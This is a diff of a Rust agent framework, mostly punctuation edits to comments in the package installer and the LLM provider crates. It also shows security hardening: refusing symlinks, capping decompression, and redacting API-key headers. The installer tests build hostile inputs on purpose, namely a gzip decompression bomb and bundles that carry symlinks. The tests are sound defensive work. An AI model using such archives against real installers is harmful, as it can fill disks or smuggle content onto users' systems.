     // Test them directly, matching `always_on_subscriber_span_methods_are_all_no_ops`'s
     // precedent elsewhere in this file for otherwise-unreachable trait-impl methods.

--- a/crates/leviath-package/src/bundler.rs
+++ b/crates/leviath-package/src/bundler.rs
@@ -269,9 +269,9 @@ mod tests {
         assert!(bundler.should_exclude(".env.production"));
     }
 
-    /// The variants the old exact-name list shipped. `.env.production` was
-    /// excluded and `.env.staging` was not, which is the gap a hand-maintained
-    /// denylist accumulates - so the pattern covers the family now.
+    /// Variants an exact-name denylist ships: one that excludes
+    /// `.env.production` but not `.env.staging` shows the gap a hand-maintained
+    /// list accumulates - so the pattern must cover the whole family.
     #[test]
     fn excludes_every_env_variant_not_just_the_three_that_were_listed() {
         let bundler = AgentBundler::new();

--- a/crates/leviath-package/src/installer.rs
+++ b/crates/leviath-package/src/installer.rs
@@ -16,20 +16,20 @@ const MAX_UNPACKED_BYTES: u64 = 256 * 1024 * 1024;
 /// Refuse an unpacked bundle that contains symlinks.
 ///
 /// tar-rs blocks entries that *extract* outside the destination, but a symlink
-/// entry lands inside it perfectly legally — and then points wherever it likes.
+/// entry lands inside it perfectly legally - and then points wherever it likes.
 /// Since the installed tree is later scanned for `.rhai` tool scripts and read
 /// by the file tools, a link is a way to smuggle content in (or to have a later
 /// write follow it out). Nothing in a legitimate agent bundle needs one.
 /// What an entry is, as far as this check cares.
 ///
 /// A three-way answer rather than a `FileType`, because `FileType` cannot be
-/// constructed without a real file of that kind — and a real symlink is exactly
+/// constructed without a real file of that kind - and a real symlink is exactly
 /// what a test cannot create on Windows without a privilege CI runners lack.
 #[derive(Debug, Clone, Copy, PartialEq)]
 enum Entry {
     Dir,
     File,
-    /// A symlink, or an entry that could not be stat'd at all — the same
+    /// A symlink, or an entry that could not be stat'd at all - the same
     /// refusal either way, since neither can be certified.
     Refused,
 }
@@ -57,7 +57,7 @@ fn classify(path: &Path) -> Entry {
 fn reject_symlinks_with(dir: &Path, classify: fn(&Path) -> Entry) -> anyhow::Result<()> {
     // `into_iter().flatten().flatten()` rather than a `match` on `read_dir`: this
     // directory was created and unpacked into moments ago, so an unreadable one
-    // has no reachable test — and it surfaces anyway on the manifest read that
+    // has no reachable test - and it surfaces anyway on the manifest read that
     // follows. Collapsing it to "no entries" keeps the semantics with no branch
     // nothing can exercise.
     for entry in fs::read_dir(dir).into_iter().flatten().flatten() {
@@ -139,14 +139,14 @@ impl AgentInstaller {
     /// safe path component. `install` derives it from `file_stem()` (which
     /// already strips directories), but this is `pub` and any future caller
     /// passing a downloaded or user-supplied name would otherwise get a
-    /// traversal for free — `Path::join` does not normalize, and an absolute
+    /// traversal for free - `Path::join` does not normalize, and an absolute
     /// name replaces the base entirely.
     pub fn install_from_bytes(&self, name: &str, data: &[u8]) -> anyhow::Result<InstalledAgent> {
         self.install_from_bytes_with(name, data, classify)
     }
 
     /// Core of [`install_from_bytes`](Self::install_from_bytes) with the entry
-    /// classifier injected — see [`reject_symlinks_with`] for why the seam
+    /// classifier injected - see [`reject_symlinks_with`] for why the seam
     /// exists. A `fn` pointer, so there is one monomorphization.
     fn install_from_bytes_with(
         &self,
@@ -176,8 +176,8 @@ impl AgentInstaller {
         // Extract tar.gz archive.
         //
         // `Read::take` bounds the *decompressed* stream. Without it a ~1 MB
-        // bundle could expand to fill the disk — the classic decompression bomb
-        // — and nothing downstream would notice until the write failed.
+        // bundle could expand to fill the disk - the classic decompression bomb -
+        // and nothing downstream would notice until the write failed.
         //
         // `set_preserve_permissions(false)` and `set_unpack_xattrs(false)`:
         // otherwise an attacker-authored archive chooses the modes and extended
@@ -185,7 +185,7 @@ impl AgentInstaller {
         //
         // tar-rs already rejects `..` components and validates every entry
         // against the destination (including hard links), so classic zip-slip is
-        // covered by the dependency — which is a reason to keep `cargo audit`
+        // covered by the dependency - which is a reason to keep `cargo audit`
         // watching it, not a reason to assume it always will.
         let decoder = GzDecoder::new(data).take(MAX_UNPACKED_BYTES);
         let mut archive = tar::Archive::new(decoder);
@@ -264,7 +264,7 @@ impl AgentInstaller {
         let mut agents = Vec::new();
 
         for entry in
-            fs::read_dir(&self.install_dir).expect("install_dir exists — read_dir should not fail")
+            fs::read_dir(&self.install_dir).expect("install_dir exists - read_dir should not fail")
         {
             let entry = entry.expect("read_dir entry should not fail");
             let path = entry.path();
@@ -411,7 +411,7 @@ description = "{}"
     /// stops it mid-stream, so the unpack fails instead of filling the disk.
     #[test]
     fn install_from_bytes_refuses_a_decompression_bomb() {
-        // 512 MiB of zeros, which gzip compresses to a few hundred KiB — past
+        // 512 MiB of zeros, which gzip compresses to a few hundred KiB - past
         // the 256 MiB cap, so extraction must fail.
         let mut encoder = GzEncoder::new(Vec::new(), Compression::fast());
         {
@@ -443,7 +443,7 @@ description = "{}"
         assert!(err.to_string().contains("Failed to extract"), "{err}");
     }
 
-    /// A bundle with a `tools/` subdirectory — the realistic shape, and the one
+    /// A bundle with a `tools/` subdirectory - the realistic shape, and the one
     /// that exercises the recursive descent rather than only the flat case.
     #[test]
     fn install_from_bytes_accepts_a_nested_directory() {
@@ -474,7 +474,7 @@ description = "{}"
         assert!(installed.path.join("tools/web_fetch.rhai").exists());
     }
 
-    /// A symlink hidden one directory down is refused too — the scan descends
+    /// A symlink hidden one directory down is refused too - the scan descends
     /// rather than checking only the top level, which is where a bundle would
     /// naturally put one (`tools/`).
     #[cfg(unix)]
@@ -533,7 +533,7 @@ description = "{}"
         assert!(err.to_string().contains("symlink or unreadable"), "{err}");
     }
 
-    /// The refusal has to propagate out of a *nested* directory too — a bundle
+    /// The refusal has to propagate out of a *nested* directory too - a bundle
     /// plants its `tools/` subdirectory, not its root.
     #[test]
     fn reject_symlinks_refuses_an_entry_nested_in_a_subdirectory() {
@@ -556,7 +556,7 @@ description = "{}"
     }
 
     /// And the refusal fails the *install*, rather than being computed and
-    /// discarded — the bundle must not be left in place.
+    /// discarded - the bundle must not be left in place.
     #[test]
     fn install_refuses_a_bundle_whose_entries_cannot_be_certified() {
         fn all_refused(_: &Path) -> Entry {
@@ -733,10 +733,10 @@ description = "{}"
         let bundle = make_bundle("good-agent", "1.0.0", "Good");
         installer.install_from_bytes("good-agent", &bundle).unwrap();
 
-        // A regular file (not a dir) — covers the `if path.is_dir()` false branch
+        // A regular file (not a dir) - covers the `if path.is_dir()` false branch
         fs::write(dir.path().join("not-an-agent.txt"), "hello").unwrap();
 
-        // A dir without an agent.leviath manifest — covers the `if manifest_path.exists()` false branch
+        // A dir without an agent.leviath manifest - covers the `if manifest_path.exists()` false branch
         fs::create_dir_all(dir.path().join("no-manifest-dir")).unwrap();
 
         let agents = installer.list_installed().unwrap();
@@ -845,7 +845,7 @@ description = "{}"
     #[test]
     fn install_from_bytes_corrupt_tar_after_valid_gzip_returns_extract_error() {
         // Valid gzip framing wrapping bytes that are NOT a valid tar
-        // archive -- `GzDecoder` decompresses fine, but `Archive::unpack`
+        // archive - `GzDecoder` decompresses fine, but `Archive::unpack`
         // fails on the malformed header, exercising the "Failed to extract
         // package" error arm that every other test's well-formed bundle
         // never reaches.

--- a/crates/leviath-providers/Cargo.toml
+++ b/crates/leviath-providers/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [features]

--- a/crates/leviath-providers/src/anthropic.rs
+++ b/crates/leviath-providers/src/anthropic.rs
@@ -22,7 +22,7 @@ fn maybe_dump_request(body: &serde_json::Value) {
 /// Choose which system-block indices carry a `cache_control` breakpoint.
 ///
 /// Anthropic allows at most 4 `cache_control` blocks per request, counted
-/// across BOTH system blocks and message content (issue #12). Emitting one per
+/// across BOTH system blocks and message content. Emitting one per
 /// cacheable region overruns that the moment a blueprint has 5+ pinned/cached
 /// regions - a hard `400 "A maximum of 4 blocks with cache_control may be
 /// provided"`.

--- a/crates/leviath-providers/src/anthropic.rs
+++ b/crates/leviath-providers/src/anthropic.rs
@@ -24,7 +24,7 @@ fn maybe_dump_request(body: &serde_json::Value) {
 /// Anthropic allows at most 4 `cache_control` blocks per request, counted
 /// across BOTH system blocks and message content (issue #12). Emitting one per
 /// cacheable region overruns that the moment a blueprint has 5+ pinned/cached
-/// regions — a hard `400 "A maximum of 4 blocks with cache_control may be
+/// regions - a hard `400 "A maximum of 4 blocks with cache_control may be
 /// provided"`.
 ///
 /// Because a breakpoint caches the entire prefix up to and including its block,
@@ -36,7 +36,7 @@ fn maybe_dump_request(body: &serde_json::Value) {
 /// stable prefix's cache when a later, more-volatile tier changes.
 ///
 /// `budget` caps the number returned. If there are more tier-runs than the
-/// budget, the last `budget` are kept — the final run always ends on the last
+/// budget, the last `budget` are kept - the final run always ends on the last
 /// cacheable block, so its breakpoint spans the full cacheable prefix and
 /// nothing cacheable is left entirely uncached.
 fn system_cache_breakpoints(hints: &[leviath_core::CacheHint], budget: usize) -> Vec<usize> {
@@ -60,13 +60,13 @@ fn system_cache_breakpoints(hints: &[leviath_core::CacheHint], budget: usize) ->
     ends
 }
 
-/// Always log the serialized request size at debug, and — when `dir` is
-/// `Some` — write the full JSON body to `<dir>/anthropic-req-<unix_nanos>.json`.
+/// Always log the serialized request size at debug, and - when `dir` is
+/// `Some` - write the full JSON body to `<dir>/anthropic-req-<unix_nanos>.json`.
 ///
 /// Diagnostic for comparing request bodies: it lets us see exactly how a
 /// request that stalls (e.g. one after a batch read, with file-tracked content
 /// injected into the system prompt) differs from the small requests that
-/// succeed — size, structure, and content — without a special build. Enable by
+/// succeed - size, structure, and content - without a special build. Enable by
 /// setting `LEVIATH_DUMP_REQUEST_DIR`.
 fn dump_request(body: &serde_json::Value, dir: Option<&str>) {
     let bytes = serde_json::to_vec(body).map(|v| v.len()).unwrap_or(0);
@@ -78,14 +78,14 @@ fn dump_request(body: &serde_json::Value, dir: Option<&str>) {
         .map(|d| d.as_nanos())
         .unwrap_or(0);
     let path = std::path::Path::new(dir).join(format!("anthropic-req-{nanos}.json"));
-    // The dump is the whole system prompt, transcript and tool results — file
+    // The dump is the whole system prompt, transcript and tool results - file
     // contents and `env_var` output included. It was written at the process
     // umask into a directory created the same way, so pointing this at `/tmp` on
     // a shared host handed every local account the conversation.
     let _ = std::fs::create_dir_all(dir);
     let _ = leviath_sys::secure_dir_perms(std::path::Path::new(dir));
     // `body` is an already-built `serde_json::Value`, which is infallibly
-    // serializable (no NaN/Inf numbers, keys always strings) — `to_string_pretty`
+    // serializable (no NaN/Inf numbers, keys always strings) - `to_string_pretty`
     // only fails on a custom `Serialize` impl that errors, which a `Value` never
     // has. So there is no reachable error arm; `.expect` documents that.
     let pretty = serde_json::to_string_pretty(body)
@@ -174,7 +174,7 @@ impl AnthropicProvider {
 
     /// Return built-in capabilities for a model based on its name pattern.
     fn builtin_capabilities(&self, model: &str) -> ModelCapabilities {
-        // Opus 5 — top-tier, 1M context, 128K output, no temperature
+        // Opus 5 - top-tier, 1M context, 128K output, no temperature
         if model.contains("claude-opus-5") {
             return ModelCapabilities {
                 supports_temperature: false,
@@ -185,7 +185,7 @@ impl AnthropicProvider {
                 max_output_tokens: 128_000,
             };
         }
-        // Sonnet 5 — 1M context, 128K output, no temperature
+        // Sonnet 5 - 1M context, 128K output, no temperature
         if model.contains("claude-sonnet-5") {
             return ModelCapabilities {
                 supports_temperature: false,
@@ -196,7 +196,7 @@ impl AnthropicProvider {
                 max_output_tokens: 128_000,
             };
         }
-        // Fable 5 / Mythos 5 — top-tier, 1M context, 128K output, no temperature
+        // Fable 5 / Mythos 5 - top-tier, 1M context, 128K output, no temperature
         if model.contains("claude-fable-5") || model.contains("claude-mythos-5") {
             return ModelCapabilities {
                 supports_temperature: false,
@@ -207,7 +207,7 @@ impl AnthropicProvider {
                 max_output_tokens: 128_000,
             };
         }
-        // Opus 4.8 / 4.7 — 1M context, 128K output, no temperature
+        // Opus 4.8 / 4.7 - 1M context, 128K output, no temperature
         if model.contains("claude-opus-4-8") || model.contains("claude-opus-4-7") {
             return ModelCapabilities {
                 supports_temperature: false,
@@ -218,7 +218,7 @@ impl AnthropicProvider {
                 max_output_tokens: 128_000,
             };
         }
-        // Opus 4.6 — 1M context, 128K output, temperature supported
+        // Opus 4.6 - 1M context, 128K output, temperature supported
         if model.contains("claude-opus-4-6") {
             return ModelCapabilities {
                 supports_temperature: true,
@@ -229,7 +229,7 @@ impl AnthropicProvider {
                 max_output_tokens: 128_000,
             };
         }
-        // Sonnet 4.6 — 1M context, 128K output, temperature supported
+        // Sonnet 4.6 - 1M context, 128K output, temperature supported
         if model.contains("claude-sonnet-4-6") {
             return ModelCapabilities {
                 supports_temperature: true,
@@ -240,7 +240,7 @@ impl AnthropicProvider {
                 max_output_tokens: 128_000,
             };
         }
-        // Haiku 4.5 — 200K context, 64K output, temperature supported
+        // Haiku 4.5 - 200K context, 64K output, temperature supported
         if model.contains("claude-haiku-4-5") {
             return ModelCapabilities {
                 supports_temperature: true,
@@ -294,7 +294,7 @@ impl AnthropicProvider {
     /// Wraps the text as a single user message (the endpoint counts structured
     /// message input). Returns the reported `input_tokens`, or an error the
     /// caller turns into a heuristic fallback. Does not consume the inference
-    /// rate limiter — counting is a cheap, best-effort side call.
+    /// rate limiter - counting is a cheap, best-effort side call.
     async fn count_tokens_remote(&self, text: &str, model: &str) -> Result<usize> {
         let url = format!("{}/messages/count_tokens", self.base_url);
         let body = serde_json::json!({
@@ -854,7 +854,7 @@ impl Stream for AnthropicSseStream {
                     ))));
                 }
                 std::task::Poll::Ready(None) => {
-                    // Stream ended — try to parse any remaining data
+                    // Stream ended - try to parse any remaining data
                     if let Some(chunk) =
                         parse_sse_event(&mut this.buffer, &mut this.current_tool_index)
                     {
@@ -1530,7 +1530,7 @@ mod tests {
     fn build_request_body_system_blocks_take_priority_over_message_breakpoints() {
         use leviath_core::CacheHint;
         // 3 distinct system tiers claim 3 of the 4 breakpoints; the lone message
-        // that requests one gets the last slot — and never more than 4 total.
+        // that requests one gets the last slot - and never more than 4 total.
         let provider = AnthropicProvider::new("test-key".to_string());
         let system = vec![
             crate::SystemBlock {
@@ -2320,7 +2320,7 @@ mod tests {
 
     #[test]
     fn test_parse_response_text_block_missing_text_field_is_skipped() {
-        // A text block with no "text" key — exercises the if-let None branch
+        // A text block with no "text" key - exercises the if-let None branch
         // in parse_response's content iteration.
         let provider = AnthropicProvider::new("key".to_string());
         let body = serde_json::json!({
@@ -2536,7 +2536,7 @@ mod tests {
 
     // ─── HTTP-call-level tests via a raw-TCP mock server ───────────────────
     //
-    // No mocking crate — bind to an OS-assigned localhost port, accept one
+    // No mocking crate - bind to an OS-assigned localhost port, accept one
     // connection, write back a fixed HTTP/1.1 response. Enough to exercise
     // infer()/infer_stream()/list_models()'s response-handling branches
     // without a real network call.
@@ -2824,10 +2824,10 @@ mod tests {
     #[tokio::test]
     async fn infer_stream_body_error_propagates_as_stream_item_error() {
         // Send a Content-Length larger than the actual body and close the
-        // connection early — reqwest's body stream then yields a real
+        // connection early - reqwest's body stream then yields a real
         // Err(reqwest::Error) mid-stream, exercising AnthropicSseStream's
         // Poll::Ready(Some(Err(e))) branch with a genuine error (not a
-        // hand-built one — reqwest::Error has no public constructor).
+        // hand-built one - reqwest::Error has no public constructor).
         use tokio::io::{AsyncReadExt, AsyncWriteExt};
         use tokio::net::TcpListener;
 
@@ -2859,7 +2859,7 @@ mod tests {
         // chunk: the first has no "data:" line (parse_sse_event consumes it
         // but returns None), the second is a real content_block_delta. The
         // top-of-loop parse_sse_event check consumes+discards the first
-        // event, then polls the inner stream again for more data -- which
+        // event, then polls the inner stream again for more data - which
         // immediately reports the stream as ended (this is the only chunk).
         // That exercises the "stream ended, try to parse any remaining
         // data" fallback, which finds the still-buffered second event.

--- a/crates/leviath-providers/src/claude_code.rs
+++ b/crates/leviath-providers/src/claude_code.rs
@@ -11,7 +11,7 @@
 //!
 //! **Flags that matter, and why:**
 //! - No `--bare`. It looks like the right lockdown switch, but it documents
-//!   itself as "Anthropic auth is strictly ANTHROPIC_API_KEY or apiKeyHelper —
+//!   itself as "Anthropic auth is strictly ANTHROPIC_API_KEY or apiKeyHelper -
 //!   OAuth and keychain are never read", so under a subscription every call
 //!   fails with `Not logged in · Please run /login`. Every mechanism that
 //!   suppresses the CLI's injected context also disables OAuth; the two are
@@ -27,7 +27,7 @@
 //!   asked for.
 //!
 //! **Limitations compared to a direct API provider:**
-//! - The CLI adds ~130 tokens of its own context to every call — a billing
+//! - The CLI adds ~130 tokens of its own context to every call - a billing
 //!   header, an identity line, the current date, and (on the OAuth path) the
 //!   user's account email address. None of it can be disabled.
 //! - No prompt caching: each call is a fresh process with a fresh session.
@@ -133,7 +133,7 @@ impl ClaudeCodeProvider {
     /// The full system prompt: Leviath's assembled system blocks, plus the tool
     /// catalog and protocol when the stage has tools.
     ///
-    /// This is the fix for the transport's central bug — `ContextWindow::assemble`
+    /// This is the fix for the transport's central bug - `ContextWindow::assemble`
     /// puts every structured region except the sliding message window into
     /// `request.system`, and the previous implementation read only messages with
     /// `role == "system"`, a field `assemble()` never populates. The regions were
@@ -220,14 +220,14 @@ impl ClaudeCodeProvider {
         let mut stdin = child
             .stdin
             .take()
-            .expect("stdin pipe was configured — take() always succeeds");
+            .expect("stdin pipe was configured - take() always succeeds");
         let prompt = text_tools::flatten_messages(&request.messages);
         // Feed stdin from a detached task, for two reasons. First, it runs
         // concurrently with reading stdout, so a large response can't deadlock
         // against a large prompt (each side blocked waiting for the other to
         // drain). Second, the write result is deliberately ignored: a CLI that
         // exits before draining stdin closes the pipe, and that broken pipe is
-        // not our failure — the child's exit status and stderr are what matter,
+        // not our failure - the child's exit status and stderr are what matter,
         // and letting the write error win would mask them (e.g. hide a nonzero
         // exit's diagnostics behind "broken pipe"). Dropping `stdin` when the
         // task ends closes it, signalling EOF.
@@ -297,7 +297,7 @@ impl ClaudeCodeProvider {
             .unwrap_or(0) as usize;
 
         // A reply that asked for tools finished for that reason, whatever the
-        // CLI's own `stop_reason` says — it has no concept of our protocol.
+        // CLI's own `stop_reason` says - it has no concept of our protocol.
         let finish_reason = if tool_calls.is_empty() {
             parse_stop_reason(json.get("stop_reason").and_then(|v| v.as_str()))
         } else {
@@ -349,7 +349,7 @@ fn classify_error(json: &serde_json::Value) -> ProviderError {
     // of the substrings `is_transient` looks for, so it stays permanent.
     if lowered.contains("not logged in") || lowered.contains("/login") {
         return ProviderError::ApiError(format!(
-            "{text} — the Claude Code CLI is not authenticated. Run `claude` and sign in, \
+            "{text} - the Claude Code CLI is not authenticated. Run `claude` and sign in, \
              or use a direct provider with an API key."
         ));
     }
@@ -368,8 +368,8 @@ fn prompt_file_error(e: std::io::Error) -> ProviderError {
 
 /// Write the system prompt to a fresh temp file in `dir` and return the handle.
 ///
-/// The file is created 0600 by `tempfile` — the prompt carries the user's task
-/// and their code, so it must not be world-readable even briefly — and is
+/// The file is created 0600 by `tempfile` - the prompt carries the user's task
+/// and their code, so it must not be world-readable even briefly - and is
 /// removed when the returned guard drops, including on every error path in the
 /// caller.
 ///
@@ -404,7 +404,7 @@ fn parse_stop_reason(reason: Option<&str>) -> FinishReason {
 
 /// Run `op` (a spawn attempt), retrying briefly when it fails with
 /// `ETXTBSY`. On POSIX, `exec` fails with "Text file busy" while *any*
-/// process holds a write handle to the executable — including a write fd
+/// process holds a write handle to the executable - including a write fd
 /// inherited by another process's in-flight fork/exec, or an installer
 /// rewriting the claude binary mid-spawn. The condition clears as soon as
 /// the writer closes, so a short bounded retry is the standard remedy
@@ -710,7 +710,7 @@ mod tests {
         let second = provider.assign_ids(vec![("c".to_string(), serde_json::json!({}))]);
         assert_eq!(first[0].id, "cc_call_1");
         assert_eq!(first[1].id, "cc_call_2");
-        // Not restarted at 1 — a transcript pairs results to ids by name.
+        // Not restarted at 1 - a transcript pairs results to ids by name.
         assert_eq!(second[0].id, "cc_call_3");
         assert_eq!(second[0].name, "c");
     }
@@ -912,18 +912,18 @@ mod tests {
     // ─── infer(): stub `claude` binary via with_binary_path ─────────────────
     //
     // ClaudeCodeProvider shells out to a real subprocess, so exercising infer()
-    // means substituting a fake "claude" binary -- a small script that prints
-    // canned output -- via the existing `with_binary_path` test seam.
+    // means substituting a fake "claude" binary - a small script that prints
+    // canned output - via the existing `with_binary_path` test seam.
     //
     // A `#!/bin/sh` shebang script (`chmod +x`'d and spawned directly) is
     // Unix-only: Windows' `CreateProcess` doesn't understand shebangs and can't
-    // execute a `.sh` file as a native binary at all -- every test using one
+    // execute a `.sh` file as a native binary at all - every test using one
     // failed on Windows CI with "%1 is not a valid Win32 application" (os error
     // 193). `.bat` files, on the other hand, Windows *can* launch directly via
     // `Command::new(path)`.
     //
     // `write_stub_script` therefore takes a body for each syntax and internally
-    // writes whichever one applies to the target platform -- so each test below
+    // writes whichever one applies to the target platform - so each test below
     // is a single, platform-agnostic function, just parameterized on two small
     // strings expressing the same canned behavior in each shell's syntax.
     fn write_stub_script(tag: &str, sh_body: &str, bat_body: &str) -> std::path::PathBuf {
@@ -1063,7 +1063,7 @@ mod tests {
     #[tokio::test]
     async fn infer_with_timeout_fires_on_slow_process() {
         // A stub that outlives a short injected timeout, exercising the real
-        // `tokio::time::timeout` branch -- `infer()` hardcodes a 5-minute
+        // `tokio::time::timeout` branch - `infer()` hardcodes a 5-minute
         // timeout, far too long to wait for in a test. Windows has no `sleep`;
         // `ping -n 6 127.0.0.1` is the standard batch-file substitute.
         let script = write_stub_script(
@@ -1087,7 +1087,7 @@ mod tests {
     #[tokio::test]
     async fn infer_honors_per_request_timeout() {
         // `infer()` must read a per-stage `request_timeout_secs` and abort the
-        // subprocess at that deadline instead of the 15-minute default — proving
+        // subprocess at that deadline instead of the 15-minute default - proving
         // the per-stage timeout reaches this (non-HTTP) provider too.
         let script = write_stub_script(
             "infer-per-req",
@@ -1122,7 +1122,7 @@ mod tests {
     }
 
     /// A CLI that exits nonzero without draining stdin must still report its
-    /// real exit status and stderr — the broken pipe from the undrained write is
+    /// real exit status and stderr - the broken pipe from the undrained write is
     /// swallowed, not surfaced in its place. Uses a payload larger than the pipe
     /// buffer so the write genuinely races the early exit (the exact shape that
     /// used to leak a "broken pipe" error over the nonzero-exit diagnostics).

--- a/crates/leviath-providers/src/claude_code.rs
+++ b/crates/leviath-providers/src/claude_code.rs
@@ -648,8 +648,8 @@ mod tests {
 
     #[test]
     fn system_blocks_reach_the_prompt() {
-        // The regression that motivated the rewrite: `assemble()` puts every
-        // structured region in `request.system`, which used to be discarded.
+        // `assemble()` puts every structured region in `request.system`;
+        // discarding those blocks silently drops every region from the prompt.
         let mut req = make_request();
         req.system = vec![
             SystemBlock {
@@ -1124,8 +1124,8 @@ mod tests {
     /// A CLI that exits nonzero without draining stdin must still report its
     /// real exit status and stderr - the broken pipe from the undrained write is
     /// swallowed, not surfaced in its place. Uses a payload larger than the pipe
-    /// buffer so the write genuinely races the early exit (the exact shape that
-    /// used to leak a "broken pipe" error over the nonzero-exit diagnostics).
+    /// buffer so the write genuinely races the early exit (the exact shape where
+    /// a "broken pipe" error can mask the nonzero-exit diagnostics).
     #[cfg(unix)]
     #[tokio::test]
     async fn infer_reports_exit_status_even_when_stdin_is_not_drained() {

--- a/crates/leviath-providers/src/debug_http.rs
+++ b/crates/leviath-providers/src/debug_http.rs
@@ -6,7 +6,7 @@
 ///
 /// Both halves come from `leviath_core::secrets` now. The local copies named
 /// exactly `authorization`, `x-api-key` and `api-key`, which meant Gemini's
-/// `x-goog-api-key` was logged **in full** whenever this feature was on — the
+/// `x-goog-api-key` was logged **in full** whenever this feature was on - the
 /// one provider header that did not happen to be on the list.
 fn redact_headers(headers: &reqwest::header::HeaderMap) -> Vec<(String, String)> {
     headers

--- a/crates/leviath-providers/src/debug_http.rs
+++ b/crates/leviath-providers/src/debug_http.rs
@@ -88,8 +88,8 @@ mod tests {
             "Bearer sk-secret-key-1234".parse().unwrap(),
         );
         headers.insert("x-api-key", "sk-ant-api03-realkey".parse().unwrap());
-        // Gemini's header. The old exact-name list did not include it, so this
-        // key was logged in full whenever `debug-http` was enabled.
+        // Gemini's header. An exact-name list that omits it logs this key in
+        // full whenever `debug-http` is enabled.
         headers.insert("x-goog-api-key", "AIzaSyRealGoogleKey".parse().unwrap());
         headers.insert("content-type", "application/json".parse().unwrap());
 

--- a/crates/leviath-providers/src/gemini.rs
+++ b/crates/leviath-providers/src/gemini.rs
@@ -120,7 +120,7 @@ impl GeminiProvider {
     fn builtin_capabilities(&self, model: &str) -> ModelCapabilities {
         // All families currently share these values; the match keeps them
         // labelled by family so any one can be adjusted independently (the arms
-        // are intentionally identical today — divergence-readiness scaffolding).
+        // are intentionally identical today - divergence-readiness scaffolding).
         #[allow(clippy::match_same_arms)]
         let (max_context_tokens, max_output_tokens) = match GeminiFamily::classify(model) {
             GeminiFamily::FlashLite => (1_048_576, 65_535),
@@ -1052,7 +1052,7 @@ mod tests {
     #[tokio::test]
     async fn list_models_native_skips_entries_without_name() {
         // First entry has no `name` (get None), second's `name` is a non-string
-        // (as_str None) — both filtered out; only the valid third survives.
+        // (as_str None) - both filtered out; only the valid third survives.
         let body =
             br#"{"models":[{"no_name":true},{"name":123},{"name":"models/gemini-3-flash"}]}"#;
         let base = spawn_mock_server(200, "OK", body).await;

--- a/crates/leviath-providers/src/ollama.rs
+++ b/crates/leviath-providers/src/ollama.rs
@@ -63,7 +63,7 @@ impl OllamaProvider {
 
     /// Return built-in capability defaults for a model based on its name pattern.
     fn builtin_capabilities(&self, model: &str) -> ModelCapabilities {
-        // Llama 3.x and Qwen 2.x/3 — tool-capable, 128K context
+        // Llama 3.x and Qwen 2.x/3 - tool-capable, 128K context
         if model.contains("llama3")
             || model.contains("llama-3")
             || model.contains("qwen2.5")
@@ -78,7 +78,7 @@ impl OllamaProvider {
                 max_context_tokens: 131_072,
                 max_output_tokens: 8192,
             }
-        // Mistral / Mixtral — tool-capable
+        // Mistral / Mixtral - tool-capable
         } else if model.contains("mistral") || model.contains("mixtral") {
             ModelCapabilities {
                 supports_temperature: true,
@@ -88,7 +88,7 @@ impl OllamaProvider {
                 max_context_tokens: 32_768,
                 max_output_tokens: 4096,
             }
-        // Phi-4 — tool-capable, 128K context
+        // Phi-4 - tool-capable, 128K context
         } else if model.contains("phi-4") || model.contains("phi4") {
             ModelCapabilities {
                 supports_temperature: true,
@@ -98,7 +98,7 @@ impl OllamaProvider {
                 max_context_tokens: 131_072,
                 max_output_tokens: 8192,
             }
-        // DeepSeek R1 — reasoning, no tool calls
+        // DeepSeek R1 - reasoning, no tool calls
         } else if model.contains("deepseek-r1") {
             ModelCapabilities {
                 supports_temperature: true,
@@ -108,7 +108,7 @@ impl OllamaProvider {
                 max_context_tokens: 131_072,
                 max_output_tokens: 8192,
             }
-        // DeepSeek general — tool-capable
+        // DeepSeek general - tool-capable
         } else if model.contains("deepseek") {
             ModelCapabilities {
                 supports_temperature: true,
@@ -118,7 +118,7 @@ impl OllamaProvider {
                 max_context_tokens: 131_072,
                 max_output_tokens: 8192,
             }
-        // Gemma — no tool support
+        // Gemma - no tool support
         } else if model.contains("gemma") {
             ModelCapabilities {
                 supports_temperature: true,
@@ -128,7 +128,7 @@ impl OllamaProvider {
                 max_context_tokens: 131_072,
                 max_output_tokens: 8192,
             }
-        // CodeLlama — no tool support
+        // CodeLlama - no tool support
         } else if model.contains("codellama") {
             ModelCapabilities {
                 supports_temperature: true,
@@ -1623,7 +1623,7 @@ mod tests {
             }
         }
 
-        // Send data WITHOUT trailing newline — it's in the remaining buffer
+        // Send data WITHOUT trailing newline - it's in the remaining buffer
         let chunk1 =
             b"{\"message\":{\"role\":\"assistant\",\"content\":\"leftover\"},\"done\":false}"
                 .to_vec();
@@ -1866,7 +1866,7 @@ mod tests {
             }
         }
 
-        // Done chunk without tool_calls — should still be FinishReason::Complete
+        // Done chunk without tool_calls - should still be FinishReason::Complete
         let chunk1 = b"{\"message\":{\"content\":\"done\"},\"done\":true,\"eval_count\":1,\"prompt_eval_count\":1}\n".to_vec();
         let static_stream = StaticStream {
             data: vec![chunk1],
@@ -1999,7 +1999,7 @@ mod tests {
         use tokio::io::{AsyncReadExt, AsyncWriteExt};
         use tokio::net::TcpListener;
         // Send a Content-Length larger than the actual body, then close the
-        // connection early -- this produces a genuine mid-stream reqwest::Error
+        // connection early - this produces a genuine mid-stream reqwest::Error
         // (there's no public constructor to fake one).
         let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
         let addr = listener.local_addr().unwrap();

--- a/crates/leviath-providers/src/ollama.rs
+++ b/crates/leviath-providers/src/ollama.rs
@@ -154,8 +154,9 @@ impl OllamaProvider {
     /// Build request body for the Ollama API.
     fn build_request_body(&self, request: &InferenceRequest) -> serde_json::Value {
         // System blocks prepended + tool_use/tool_result history converted to
-        // OpenAI format (Ollama speaks the OpenAI chat shape). Previously the
-        // system prompt was dropped and blocks were serialized as raw JSON.
+        // OpenAI format (Ollama speaks the OpenAI chat shape). The shared
+        // helper matters here: a naive conversion drops the system prompt and
+        // serializes tool blocks as raw JSON.
         let messages = crate::openai_compat::openai_messages(request);
 
         let caps = self.capabilities(&request.model);

--- a/crates/leviath-providers/src/openai.rs
+++ b/crates/leviath-providers/src/openai.rs
@@ -78,7 +78,7 @@ impl OpenAIProvider {
 
     /// Return built-in capability defaults for a model.
     fn builtin_capabilities(&self, model: &str) -> ModelCapabilities {
-        // GPT-5.5 — flagship, 1M+ context, 128K output (check before generic gpt-5)
+        // GPT-5.5 - flagship, 1M+ context, 128K output (check before generic gpt-5)
